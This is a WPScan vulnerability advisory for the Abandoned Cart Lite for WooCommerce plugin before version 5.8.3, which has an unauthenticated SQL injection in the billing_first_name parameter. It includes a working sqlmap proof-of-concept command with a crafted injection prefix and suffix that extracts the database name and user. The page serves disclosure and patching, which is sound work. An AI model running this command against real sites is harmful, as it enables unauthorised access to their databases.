WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Abandoned Cart Lite for WooCommerce < 5.8.3 - Unauthenticated SQL Injection

Description

The plugin is affected by an unauthenticated SQL injection via the billing_first_name parameter of the save_data AJAX call.

Proof of Concept

From the original researcher: ./sqlmap.py -u https://example.com/wp-admin/admin-ajax.php --cookie='[cookies content here]' --method='POST' --data='billing_first_name=attacker&billing_last_name=attacker&billing_company=attacker&billing_address_1=wpdeeply&billing_address_2=attacker&billing_city=attacker&billing_state=attacker&billing_postcode=123234&billing_country=GB&billing_phone=12324&billing_email=attacker%40attacker.com&order_notes=&wcal_guest_capture_nonce=[nonce-value]&action=save_data' -p billing_first_name --prefix="', '', '','', '',( TRUE " --suffix=")) -- attacker" --dbms mysql --technique=T --time-sec=1 --current-db --current-user

Affects Plugins

woocommerce-abandoned-cart
Fixed in version 5.8.3

References

URL
https://wpdeeply.com/woocommerce-abandoned-cart-before-5-8-2-sql-injection/
URL
https://plugins.trac.wordpress.org/changeset/2413885

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

mslavco

Verified

No

WPVDB ID
0216367e-aa75-4d65-9d4f-4589bb7784ff

Timeline

Publicly Published

2020-11-08 (about 2 years ago)

Added

2020-11-08 (about 2 years ago)

Last Updated

2020-11-09 (about 2 years ago)

Our Other Services

WPScan WordPress Security Plugin